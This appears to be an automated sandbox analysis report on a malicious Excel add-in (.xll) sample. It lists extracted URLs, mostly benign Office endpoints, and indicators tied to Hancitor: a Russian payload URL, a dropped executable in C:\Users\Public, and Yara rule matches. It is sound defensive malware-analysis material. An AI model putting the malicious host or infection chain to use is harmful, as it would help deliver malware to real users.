        Source: 0708_5355150121.xll | String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
        Source: powershell.exe, 00000002.00000002.350802485.0000000005BA1000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.335236045.0000000005943000.00000004.00000001.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
        Source: 0708_5355150121.xll | String found in binary or memory: http://ocsp.comodoca.com0
        Source: 0708_5355150121.xll | String found in binary or memory: http://ocsp.sectigo.com0
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
        Source: powershell.exe, 00000006.00000002.332192660.0000000004A22000.00000004.00000001.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
        Source: powershell.exe, 00000002.00000002.348758603.0000000004C80000.00000004.00000001.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png8
        Source: powershell.exe, 00000002.00000002.348512770.0000000004B41000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.331698788.00000000048E1000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: powershell.exe, 00000006.00000002.333951627.0000000004CEF000.00000004.00000001.sdmp | String found in binary or memory: http://srand04rf.ru
        Source: powershell.exe, 00000006.00000002.333971406.0000000004CF7000.00000004.00000001.sdmp | String found in binary or memory: http://srand04rf.ru/08
        Source: PowerShell_transcript.888683.93l2YHGR.20210708163033.txt.6.dr | String found in binary or memory: http://srand04rf.ru/08.jpg
        Source: powershell.exe, 00000006.00000002.332529239.0000000004AEB000.00000004.00000001.sdmp | String found in binary or memory: http://srand04rf.ru4&jt
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: http://weather.service.msn.com/data.aspx
        Source: powershell.exe, 00000006.00000002.332192660.0000000004A22000.00000004.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
        Source: powershell.exe, 00000002.00000002.348758603.0000000004C80000.00000004.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html8
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://addinsinstallation.store.office.com/app/download
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://addinslicensing.store.office.com/commerce/query
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://analysis.windows.net/powerbi/api
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://api.aadrm.com/
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://api.addins.omex.office.net/appstate/query
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://api.addins.store.office.com/app/query
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://api.cortana.ai
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://api.diagnostics.office.com
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://api.diagnosticssdf.office.com
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://api.microsoftstream.com/api/
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://api.office.net
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://api.onedrive.com
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://apis.live.net/v5.0/
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://augloop.office.com
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://augloop.office.com/v2
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://cdn.entity.
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://clients.config.office.net/
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://config.edge.skype.com
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
        Source: powershell.exe, 00000006.00000002.335236045.0000000005943000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
        Source: powershell.exe, 00000006.00000002.335236045.0000000005943000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
        Source: powershell.exe, 00000006.00000002.335236045.0000000005943000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://cortana.ai
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://cortana.ai/api
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://cr.office.com
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://dataservice.o365filtering.com
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://dataservice.o365filtering.com/
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://dev.cortana.ai
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://devnull.onenote.com
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://directory.services.
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://enrichment.osi.office.net/
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
        Source: powershell.exe, 00000006.00000002.332192660.0000000004A22000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
        Source: powershell.exe, 00000002.00000002.348758603.0000000004C80000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester8
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
        Source: powershell.exe, 00000006.00000003.320087365.000000000530E000.00000004.00000001.sdmpString found in binary or memory: https://go.micro
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://graph.ppe.windows.net
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://graph.ppe.windows.net/
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://graph.windows.net
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://graph.windows.net/
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://incidents.diagnostics.office.com
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://lifecycle.office.com
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://login.microsoftonline.com/
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://login.windows.local
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://management.azure.com
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://management.azure.com/
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://messaging.office.com/
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://ncus.contentsync.
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://ncus.pagecontentsync.
        Source: powershell.exe, 00000002.00000002.350802485.0000000005BA1000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.335236045.0000000005943000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://officeapps.live.com
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://onedrive.live.com
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://onedrive.live.com/embed?
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://osi.office.net
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://outlook.office.com/
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://outlook.office365.com/
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://pages.store.office.com/review/query
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://powerlift.acompli.net
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
        Source: 0708_5355150121.xllString found in binary or memory: https://sectigo.com/CPS0
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://settings.outlook.com
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://shell.suite.office.com:1443
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://skyapi.live.net/Activity/
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://staging.cortana.ai
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://store.office.cn/addinstemplate
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://store.office.com/addinstemplate
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://store.office.de/addinstemplate
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://tasks.office.com
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://templatelogging.office.com/client/log
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://web.microsoftstream.com/video/
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://webshell.suite.office.com
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://wus2.contentsync.
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://wus2.pagecontentsync.
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://www.odwebp.svc.ms

        System Summary:

        Malicious sample detected (through community Yara rule)
        Source: 16.3.snd32sys.exe.12f4305.0.unpack, type: UNPACKEDPE | Matched rule: Hancitor Payload Author: kevoreilly
        Source: 16.3.snd32sys.exe.12f4305.0.raw.unpack, type: UNPACKEDPE | Matched rule: Hancitor Payload Author: kevoreilly
        Source: 16.2.snd32sys.exe.610000.0.unpack, type: UNPACKEDPE | Matched rule: Hancitor Payload Author: kevoreilly
        Powershell drops PE file
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\Public\snd32sys.exe
        Source: C:\Users\Public\snd32sys.exe | Process Stats: CPU usage > 98%
        Source: C:\Windows\SysWOW64\mshta.exe | Code function: 1_3_064950B7
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_04B2E670
        Source: C:\Users\Public\snd32sys.exe | Code function: 16_2_00643154
        Source: C:\Users\Public\snd32sys.exe | Code function: 16_2_0063A1B7
        Source: C:\Users\Public\snd32sys.exe | Code function: 16_2_0063C250
        Source: C:\Users\Public\snd32sys.exe | Code function: 16_2_0064920D
        Source: C:\Users\Public\snd32sys.exe | Code function: 16_2_00643386
        Source: C:\Users\Public\snd32sys.exe | Code function: 16_2_0062D39F
        Source: C:\Users\Public\snd32sys.exe | Code function: 16_2_00629420
        Source: C:\Users\Public\snd32sys.exe | Code function: 16_2_006435C7
        Source: C:\Users\Public\snd32sys.exe | Code function: 16_2_0065F68B
        Source: C:\Users\Public\snd32sys.exe | Code function: 16_2_00639707
        Source: C:\Users\Public\snd32sys.exe | Code function: 16_2_0062D711
        Source: C:\Users\Public\snd32sys.exe | Code function: 16_2_0063C7C0
        Source: C:\Users\Public\snd32sys.exe | Code function: 16_2_0065F7AB
        Source: C:\Users\Public\snd32sys.exe | Code function: 16_2_0064382C
        Source: C:\Users\Public\snd32sys.exe | Code function: 16_2_0065B830
        Source: C:\Users\Public\snd32sys.exe | Code function: 16_2_0062D9BB
        Source: C:\Users\Public\snd32sys.exe | Code function: 16_2_00643AA0
        Source: C:\Users\Public\snd32sys.exe | Code function: 16_2_0062CB20
        Source: C:\Users\Public\snd32sys.exe | Code function: 16_2_0063CBF0
        Source: C:\Users\Public\snd32sys.exe | Code function: 16_2_00652C03
        Source: C:\Users\Public\snd32sys.exe | Code function: 16_2_00642CE1
        Source: C:\Users\Public\snd32sys.exe | Code function: 16_2_0062DC82
        Source: C:\Users\Public\snd32sys.exe | Code function: 16_2_00643D05
        Source: C:\Users\Public\snd32sys.exe | Code function: 16_2_0062DF3D
        Source: C:\Users\Public\snd32sys.exe | Code function: 16_2_00642F13
        Source: C:\Users\Public\snd32sys.exe | Code function: String function: 0062B2C4 appears 61 times
        Source: C:\Users\Public\snd32sys.exe | Code function: String function: 0062BBA0 appears 50 times
        Source: C:\Users\Public\snd32sys.exe | Code function: String function: 0062B2F8 appears 46 times
        Source: 0708_5355150121.xll | Static PE information: invalid certificate
        Source: snd32sys.exe.6.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
